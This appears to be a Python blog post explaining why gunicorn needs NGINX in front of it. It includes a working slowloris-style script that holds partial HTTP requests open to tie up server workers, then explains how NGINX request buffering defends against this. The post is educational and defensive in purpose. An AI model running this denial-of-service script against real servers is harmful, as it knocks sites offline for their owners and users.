How not to deploy web applications

Last updated on April 29, 2018, in Python

Recently, I was looking for tutorials on how to deploy a Django application in 2018. After some research, I found an article which suggests using gunicorn behind an nginx web server, which is a pretty standard way of doing it. However, one thing caught my attention.

The author of the article suggests binding the gunicorn server to an address that opens gunicorn to the external world (the internet).

gunicorn -b app.wsgi

At first glance, you might think that it is not a big problem and there is nothing to worry about. In reality, you should never expose an internal WSGI web server to the internet. Knowing the port, an attacker can quickly make your gunicorn server unavailable. The interesting part is that the attacker does not need to flood it with traffic. A small, slow stream of data is enough to make the server completely unresponsive.

By default, gunicorn uses a synchronous worker model, where each worker handles one request at a time. Normally, that is not a big deal, because on average a simple web application can generate a response in under 200 milliseconds. So if all workers are occupied, the client has to wait an additional few hundred milliseconds. Also keep in mind that most websites rarely get more than one request at a time.
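To make the waiting time concrete, here is a rough back-of-the-envelope sketch. The function name and the simplified model (every request takes the same time, requests are served in rounds) are my own assumptions for illustration, not something gunicorn provides.

```python
def worst_case_wait_ms(concurrent_requests, workers=1, response_ms=200):
    """Estimate how long the last of several simultaneous requests waits
    before a synchronous worker starts handling it (simplified model)."""
    if concurrent_requests < 1 or workers < 1:
        raise ValueError("need at least one request and one worker")
    # Each worker serves one request at a time, so requests are handled
    # in rounds of `workers` requests each.
    rounds_before_last = (concurrent_requests - 1) // workers
    return rounds_before_last * response_ms


print(worst_case_wait_ms(1))             # 0: a lone request never waits
print(worst_case_wait_ms(2))             # 200: the second request waits for the first
print(worst_case_wait_ms(5, workers=2))  # 400
```

With normal clients the queue drains quickly, which is why a single synchronous worker is usually good enough for a small site.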

In gunicorn, the default number of workers is one, so to keep a gunicorn web server busy an attacker only has to send more than one request at a time. However, that is a crude approach which generates a lot of traffic.

To completely occupy a single worker, an attacker can use a low and slow attack, which slows down a single HTTP request in such a way that the web server is kept busy waiting for the rest of the data.

import random
import socket
import string
import time

def init_request(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))

    s.send(b"GET / HTTP/1.1\r\n")
    return s

ip = "localhost"
port = 8000

workers_count = 1
sockets = [init_request(ip, port) for _ in range(workers_count)]

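while True:
    for i, s in enumerate(sockets):
        try:
            # check a connection by sending a random header
            header = "%s: %s\r\n" % (random.choice(string.ascii_letters), random.randint(1, 99999))
            s.send(header.encode("ascii"))
        except socket.error:
            # recreate a dead socket
            sockets[i] = init_request(ip, port)
    # pause between headers so the request trickles in slowly
    # (the 10 second interval is an assumption, anything below the server timeout works)
    time.sleep(10)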

The script above creates a TCP connection to the web server and sends only part of an HTTP request, so gunicorn waits for the rest of the data. The default timeout for an HTTP request is 30 seconds. By opening a single connection, we block the whole website for 30 seconds! It does not matter how many workers you are using, because creating such connections is very cheap.
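The reason the worker keeps waiting is that an HTTP/1.1 request head is only finished once an empty line arrives. A minimal sketch of that check follows; the helper name is hypothetical, and this is not gunicorn's actual parser.

```python
def is_request_head_complete(data: bytes) -> bool:
    """Return True once the request line and headers end with a blank line."""
    return b"\r\n\r\n" in data


# What a slow client sends: a request line, then one header at a time,
# but never the terminating blank line.
received = b"GET / HTTP/1.1\r\n"
for header in (b"a: 1\r\n", b"b: 2\r\n", b"c: 3\r\n"):
    received += header
    assert not is_request_head_complete(received)

# A well-behaved client finishes the head with an empty line.
print(is_request_head_complete(received + b"\r\n"))  # True
```

As long as the blank line never arrives, a server that reads the request inside the worker has nothing to process and can only wait or time out.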

How NGINX helps with low and slow attacks

As it turns out, NGINX buffers each request before sending it to the WSGI server. That is, it waits for the complete request body and then passes the request to the gunicorn web server. A typical nginx configuration can handle thousands of slow simultaneous requests.

When buffering is enabled, the entire request body is read from the client before sending the request to a proxied server.

When buffering is disabled, the request body is sent to the proxied server immediately as it is received. In this case, the request cannot be passed to the next server if nginx already started sending the request body.

When HTTP/1.1 chunked transfer encoding is used to send the original request body, the request body will be buffered regardless of the directive value unless HTTP/1.1 is enabled for proxying.
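The idea behind request buffering can be illustrated with a toy Python sketch. This is not how NGINX is implemented: the class name is hypothetical, it only understands Content-Length bodies (no chunked encoding), and it does no error handling. It only shows the principle that nothing is handed to the backend until the whole request has arrived.

```python
class RequestBuffer:
    """Collects bytes from a slow client and releases the request only when complete."""

    def __init__(self):
        self._data = b""

    def feed(self, chunk: bytes):
        """Add a chunk; return the full request once complete, else None."""
        self._data += chunk
        head, sep, body = self._data.partition(b"\r\n\r\n")
        if not sep:
            return None  # headers are not finished yet
        expected = 0
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                expected = int(value.strip())
        if len(body) < expected:
            return None  # body is not fully received yet
        return head + sep + body[:expected]


buf = RequestBuffer()
print(buf.feed(b"POST / HTTP/1.1\r\nContent-Length: 5\r\n"))  # None
print(buf.feed(b"\r\nhel"))                                   # None
print(buf.feed(b"lo"))  # b'POST / HTTP/1.1\r\nContent-Length: 5\r\n\r\nhello'
```

A slow client only ties up a cheap buffer like this one in the proxy, while the backend worker sees the request in one piece and can answer it immediately.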

That is one of the reasons why you should always use NGINX in front of your web application. Be aware of HTTP details and don't use them for evil :).
